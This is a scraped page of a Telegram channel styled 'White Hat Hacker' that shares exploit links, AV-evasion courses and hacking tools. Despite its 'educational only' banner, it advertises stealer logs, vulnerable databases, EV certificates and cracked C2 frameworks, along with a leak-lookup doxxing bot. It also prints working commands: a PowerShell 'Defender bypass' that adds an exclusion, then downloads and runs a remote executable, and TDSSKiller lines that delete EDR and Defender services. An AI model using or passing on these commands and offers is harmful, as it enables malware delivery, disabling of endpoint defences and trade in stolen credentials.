whitehathacker47 | Unsorted

Telegram-канал whitehathacker47 - WHITE HAT HACKER

3888

❗️This is Educational Channel ❗️No Carding ❗️No Porn ❗️No Blackhat ❗️No illegal Activity ❗️We DoNot Support, Encourage & Promote Any illegal Activity All Post are Educational Puspose Only

Subscribe to a channel

WHITE HAT HACKER

Bug Bounty Complete Course Free Direct Link By /channel/whitehathacker47



Course Download Link:-
https://drive.google.com/drive/u/0/mobile/folders/1t-hTqg0-02t0cnc5SypHnb8t3CfE3bXU

Читать полностью…

WHITE HAT HACKER

DarkGen Private Channel LifeTime Access 85% XMESS Offer ( Special offer ) Valid only 20 users

Price - 60 USD Only (join fast)

Private Databases with Vuln (Daily Update)

Fresh Stealer TXT Logs (Daily Update)

UrlScan Pro Data (297GB+)

Private YARA and Sigma Rules (14k+)

Some bit shared tools

Invicti Enterprise latest
BurpSuite Enterprise (lic)
Metasploit pro
Nessus Professional
Slingshot v2 C2
Core Impact 21.6
Shellter Pro Plus with GUI
ExploitPack 18
ControlPack (beta)
CobaltStrike 4.10 with all kits (not cracked shit)
Sn1per Pro 10.04
Thor APT scanner (lic)
D2 Elite WE framework
Immunity Innuendo
Immunity Canvas 7.31
Nighthawk C2 0.2.4
Brute Ratel C4 v2.0.2
Nexpose Enterprise (lic)
MacroPack Pro v2.6.2 + GUI
ShellcodePack v1.3.0
Nessus Expert (lic)
IDA Pro 9.0 + Lumina
PeStudio Pro 9.56
Binary Ninja Enterprise 4.1
Vex Scanner
Oxygen Forensic Detective
UFED (all products)
XRY Forensic

EV Certificates (318+)

etc.. & Many more

Buy fast - @cybergenofficial

#darkmatter #pentest #darkside #tools

Читать полностью…

WHITE HAT HACKER

Free High Quality Leak Lookup OSINT Bot

Bot: @cybergenosintBot


Bot Features:

1) Search By Email
2) Search By Name Or NickName
3) Search By Mobile Number
4) Search By Password
5) Search By Car
6) Search For Telegram Account
7) Search For Facebook Account
8) Search For Instagram Account
9) Search By IP

Message @cybergenofficial To Add Your Channel In It

Читать полностью…

WHITE HAT HACKER

Zed Attack Proxy Cookbook

#attack #hacking #eng

Читать полностью…

WHITE HAT HACKER

We are launching codecanyon like source code buy & sell platform worldwide

If you have ready code & documentation and if you are interested to sell your code scripts on our platform please dm me @cybergenofficial .

Note: please don't come with codecanyon nulled script.

Читать полностью…

WHITE HAT HACKER

CVE- 2024-48990 : Linux LPE via needrestart

PATCHED: Nov 19, 2024

PoC: https://github.com/makuga01/CVE-2024-48990-PoC

Info: https://www.qualys.com/2024/11/19/needrestart/needrestart.txt

P.S. Although you need to wait for needrestart to run for the add-on (which starts, for example, with apt upgrade ), the patch is only three days old, and it has not yet been added to all Debian repos)

#exploit #pentest #redteam #lpe #linux

Читать полностью…

WHITE HAT HACKER

Thor APT Scanner 10.7.17 - 29 Oct 2024 | Full version ( Not Cracked )

Читать полностью…

WHITE HAT HACKER

Windows inside a Docker container.

https://github.com/dockur/windows

Читать полностью…

WHITE HAT HACKER

Burp Suite Professional v2024.9.4 + BurpBounty_Pro 2.8.0 + JDK 22

NOTE - Run this version With Java SE JDK 22

Released Wednesday, 30 October 2024

@WHITEHATHACKER47 #pentest #security

Читать полностью…

WHITE HAT HACKER

THE ART OF WEB RECONNAISSANCE BUG BOUNTY ETHICAL HACKING

size : 2.9 GB

Language : English

Download link

https://mega.nz/folder/NuEAHQpQ#tFtXUXkov2-JmzQhv23l5w


Notice!!!

For those who can not Access ♿ our telegram channel through the formal 🖇️ link 🫰 A new 🔗 link Have been created again 🪐 so join through this link 🔗🖇️

❤️‍🔥Join Our Telegram Channel❤️‍🔥
🫀 /channel/whitehathacker47 🫀

Читать полностью…

WHITE HAT HACKER

How to Bypass OTP via Brute Force Using Burp Suite and ffuf,Also explain part of rate limit

Posted by @WHITEHATHACKER47

Читать полностью…

WHITE HAT HACKER

CVE-2024-7479 & CVE-2024-7481: TeamViewer User to Kernel LPE

PoC: https://youtu.be/lUkAMAK-TPI

exploit: https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481

Affected:
* from 15.0.0 before 15.58.4 
* from 14.0.0 before 14.7.48796 
* from 13.0.0 before 13.2.36225 
* from 12.0.0 before 12.0.259312 
* from 11.0.0 before 11.0.259311 


#lpe #pentest #redteam #exploit

Читать полностью…

WHITE HAT HACKER

🌜Bug Bounty Tools + Resources🌜

✅ Share with your Mates

✗ /channel/whitehathacker47 ✗

Читать полностью…

WHITE HAT HACKER

Burp Suite Professional v2024.8.1 + BurpBounty_Pro 2.8.0 + JDK 22

NOTE - Run this version With Java SE JDK 22

Released Friday, 13 September 2024

@WHITEHATHACKER47 #pentest #security

Читать полностью…

WHITE HAT HACKER

Kaspersky TDSSKiller abuse to disable EDR software

You can abuse TDSSKiller to interact with kernel-level services to disable EDR software running on the machine.
 
Removal of Malwarebytes Anti-Malware Service:

tdsskiller.exe -dcsvc MBAMService 


Removal of Microsoft Defender:
tdsskiller.exe -dcsvc windefend 


The "-dcsvc <service_name>" command deletes the specified service, removing the registry keys and executables associated with the service and software.

Читать полностью…

WHITE HAT HACKER

✔️ Learn Wi-Fi Hacking From Scratch WPA3/WPA2/WPA/WEP

▫️ Master Wi-Fi hacking quickly and become a specialist. 

▫️ Learn to break all Wi-Fi security types (WPA3, WPA2, WPA, WEP) and control the network. 

▫️ Gain advanced Wi-Fi hacking knowledge fast. 

▫️ Secure your network like a pro. 

▫️ Start from scratch and reach intermediate level. 

▫️ Learn the latest methods and techniques. 

▫️ Protect your network from hackers. 

▫️ Get basics of Linux. 
Practical videos with theory in a short time!

⭐ Give Reactions 🟥

Читать полностью…

WHITE HAT HACKER

If you want your own bot like this bot contct on @cybergenofficial

Читать полностью…

WHITE HAT HACKER

ZigStrike

A robust shellcode #loader developed in Zig, offering a variety of #injection techniques and anti-sandbox features. It leverages compile-time capabilities for efficient #shellcode allocation, demonstrating proven success in bypassing advanced security solutions. ZigStrike includes a custom #payload builder, allowing users to easily select and construct payloads via a web application built with Python.

Multiple Injection Techniques:
• Local Thread
• Local Mapping
• Remote Mapping
• Remote Thread hijacking
Anti-Sandbox Protection:
• TPM Presence Check
• Domain Join Check
Output Formats:
• XLL (Excel Add-in)
• DLL
Advanced Features:
• Base64 Shellcode Encoding
• Compile-time String Processing
• Memory Protection Handling
• Process Targeting

Blog: https://kpmg.com/nl/en/home/insights/2024/12/zig-strike-the-ultimate-toolkit-for-payload-creation-and-evasion.html

Читать полностью…

WHITE HAT HACKER

https://www.rootcon.org/html/archives/rc18

Читать полностью…

WHITE HAT HACKER

PEN-200: #Penetration Testing with Kali Linux

Читать полностью…

WHITE HAT HACKER

— Bypass Windows Defender FUD Method —

Add-MpPreference -ExclusionPath $env:USERPROFILE\Downloads
$url = 'Your URL'
$outputFile = [System.IO.Path]::Combine($env:USERPROFILE, 'Downloads', 'NAME.exe')

# Wait until the exclusion is confirmed (just a safeguard, usually it happens instantly)
Start-Sleep -Milliseconds 100

# Download the file
Invoke-WebRequest -Uri $url -OutFile $outputFile

# Run the downloaded file after the download is complete
Start-Process -FilePath $outputFile

Читать полностью…

WHITE HAT HACKER

Python implementation of GhostPack's Seatbelt situational awareness tool

https://github.com/0xthirteen/Carseat

#git #pentest #ad

Читать полностью…

WHITE HAT HACKER

🚀🚀 Canva Pro Subscription On Your Own Email Only In RS. 299/- 🚀🚀


LIMITED TIME OFFER
INSTANT ACCESS


https://gplcircle.com/product/canva-pro-subscription/

Buy using this link.

Or Contact Us On : @cybergenofficial / https://wa.me/+19093663616

#canva

Читать полностью…

WHITE HAT HACKER

Acunetix Premium - v24.9.240924_080

https://www.acunetix.com/changelogs/acunetix-premium/v24-9-1-on-prem-24-september-2024/

Читать полностью…

WHITE HAT HACKER

CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177: Linux OpenPrinting CUPS RCE

PoC: https://github.com/RickdeJager/cupshax

patch:

sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed


#exploit #git #pentest #redteam

Читать полностью…

WHITE HAT HACKER

⚡Top Hacking / Cyber Security Related Posts
🪪By Daniel Kelley

🔗https://cyte.in/cDBFR

Читать полностью…

WHITE HAT HACKER

Antivirus Evasion Hard Core

Language : English

Size : 1 GB

Last update : 20-09-2024

Info

1 - Course Prelude

2 - Lab Setup Configuration

3 - AV Evasion

Download link

https://mega.nz/file/g6MhzRbQ#TOKndyfmToiVLcqcyN2VYRNniA463nEWzkJhXLb4e54

Читать полностью…

WHITE HAT HACKER

XAMN Pro & All offline map

Pass - XAMN_ZDL

XAMN Pro is next level mobile forensics; a powerful intuitive tool that helps you find and analyze data faster, easier, with greater precision.

Читать полностью…

WHITE HAT HACKER

Phishing with a fake reCAPTCHA

This is small harness to recreate the social engineering and phishing lure recently seen in the wild around August/September 2024.

Читать полностью…

WHITE HAT HACKER

Nagios XI — RCE

Nagios XI 2024R1.01 has a vulnerability in the monitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution.

Source:
https://github.com/MAWK0235/CVE-2024-24401

#nagios #sql #rce #privesc #poc #exploit

Читать полностью…
Subscribe to a channel